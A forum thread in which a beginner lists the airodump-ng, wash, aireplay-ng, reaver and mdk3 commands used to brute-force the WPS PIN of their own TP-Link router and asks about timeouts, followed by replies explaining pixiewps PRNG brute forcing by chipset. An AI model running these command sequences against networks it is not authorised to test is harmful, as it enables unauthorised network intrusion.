Print

Please login or register.
1 Hour 1 Day 1 Week 1 Month Forever
Login with username, password and session length

Sorry Guest, you are banned from posting and sending personal messages on this forum.

This ban is not set to expire.

[minimalis]

Hello aircrack-ng community,

I've recently been introduced to Kali Linux which I intend to learn in the next few years to come.
(BTW could anyone recommend a good book for a complete beginner, preferably one that can be bought or converted into Kindle format. I am not really into online courses.)
Anyways, I figured I would test my router first, thinking practice makes perfect.
I will try to give you as much information as possible on the progress I've made.

I originally had MAC Filtering enabled so I had to disable that also I decided to enable SSID broadcast for this penetration test. Just to make things a bit easier.

Wless adapter I'm using: TL-WN722N
Router in question: TL-WR720N

rockyou.txt and my personal wlist couldn't find my passphrase and my router is not PixieDust vulnerable. So far so good.

I figured I would try to brute-force the WPS PIN.

Terminal#1:

Code: [Select]

airmon-ng check kill
airodump-ng wlan1I've read somewhere that airodump-ng wlan1 is preferred over airmon-ng wlan1; airodump-ng wlan1mon. Because the former makes use of the whole card. I do not know if it makes any sense. I've tried both the end result is the same.
When I find the BSSID of my router:

Code: [Select]

airodump-ng --bssid {R_BSSID} wlan1 -c #

New terminal window
Terminal#2:

Code: [Select]

wash -i wlan1I confirm that the router is in fact WPS enabled and is not locked.

Code: [Select]

aireplay-ng -1 0 -a {R_BSSID} wlan1
I've read somewhere that this was supposed to fix my problem. It didn't but I still do it just in case.

At this point I start reaver in Terminal#2

Code: [Select]

reaver -i wlan1 -b {R_BSSID} -d 3 -vv -w -S -N -c #
And it works. It starts cracking the PIN. No AP Limiting. The process is fairly fast.
It gives the ETA of 8-10h hours.

That is until ~15 minutes into the process. After which these start to appear:

Code: [Select]

[+] Sending M2 message
[!] WARNING: Receive timout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code:0x02), re-trying last pin

Usually the warning comes after the M2 message, but not always sometimes right after EAPOL START request sometimes after M4 message.
Sometimes the next try succeeds sometimes it gives an error 10 or more times in a row before it is able to advance to the next PIN.
ETA goes up to 6days!!!
Okay. I know 6days isn't that much compared to brute-forcing a PSK directly but compared to the earlier 10ish hours, it is a lot. And who know what if it gets even slower after a couple hours?

Tried to restart my router from Terminal via:

Terminal#3

Code: [Select]

mdk3 wlan1 a -a {R_BSSID} -m
AP seems invulnerable

Code: [Select]

mdk3 wlan1 a -i {R_BSSID} -m
AP seems invulnerable
(I do have DDoS protection in my router)

Restarting Kali Linux doesn't solve the problem.
Restarting the router seems to solve it, but manually restarting it doesn't really feel like a solution.

Has anyone ever come across a problem like this? Could anyone help me find a solution?

Thank you in advance.

(English is not my first language so pardon any mistakes. I will try to rephrase if something I wrote is not understandable.)

[Hosehead1]

Your TP Link router is stalling responses to reaver after so many tries? I've seen this many times but always against certain Netgear wifi routers - you can get maybe 700 or 1000 pins but then it's all timeouts until the wifi router gets rebooted. And I have NO IDEA why...  is there some logfile inside the router that gets "full" and must be cleared before reaver may resume?
But re: this thread's title - I have an interesting reaver question about the old pixiewps --force option for brute forcing the PRNG, so I also wonder if there's a correct place to inquire. Is there a pixiewps forum? or a dedicated reaver forum?

[kcdtv]

kali forum was the forum where pixiewps got developed.
And where the last versions of reavers with pixiewps attack were developed too.
You can ask your question here o there, if it is not a pure code related one I can answer you     

[Hosehead1]

Thanks kcdtv...  I'm not on Kali just now so I'll ask as best I can from memory. A bit over a year ago I'd run the -K -f options and if pixiewps said "pin not found" it would proceed to attempt to brute force the PRNG, taking maybe 30 minutes to an hour before finishing with 'pin not found'. Nowadays the -f switch no longer does "brute force PRNG", now it means "force disable channel hopping".
Why was the brute force PRNG attack removed? Granted, it never worked for me but it felt good to keep trying. lol

[kcdtv]

Why was the brute force PRNG attack removed? Granted, it never worked for me but it felt good to keep trying. lol

It is not removed.
What happens is that wiire automatized it in the last version of pixiewps.
We have 3 cases
  - Ralink chipset : no brute force of PRNG is required as the value of ES1 and ES2 is always 0. Crack of hashes is inmediate.
  - Broadcom chipset: brute force of PRNG is trivial and immediate because the seed use to randomize is very week
  - Last case : Realtek
  For the two first first cases everything is automatic since day one as there is no entropy (ralink) or a very weak one. (broadcom)
   Last case (realteck) is the one that can requires a longer brute force.
      1) The seed used is the value in second at the time of the WPS exchange = no brute force
       2) Or the time in seconds of the last firmware installation-activation = in this case a little brute force is needed.
  A fact to know is that the realteck devices use permanently in every device the same PKE:

Code: [Select]

[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek   
  Pixiewps does now detect that automatically.
  If this PKE is founded it will automatically launch the brute force of PRNG if the case that the  PIN is not found straightforward (with the actual time as a value for the seed.)
  So the -f switch was changed as it is not necessary any more to specify that you want the PRNG brute force.

, it never worked for me but it felt good to keep trying. lol

  I think that you can still try it but you would have to copy paste the stdout of reaver to grab the hashes and lauch pixiewps with the brute force option.
  But it won't work for sure... This is jut for realteck devices from "RTL819X project", the devices that are built using the realteck SDK for this chipsets (rtl819something)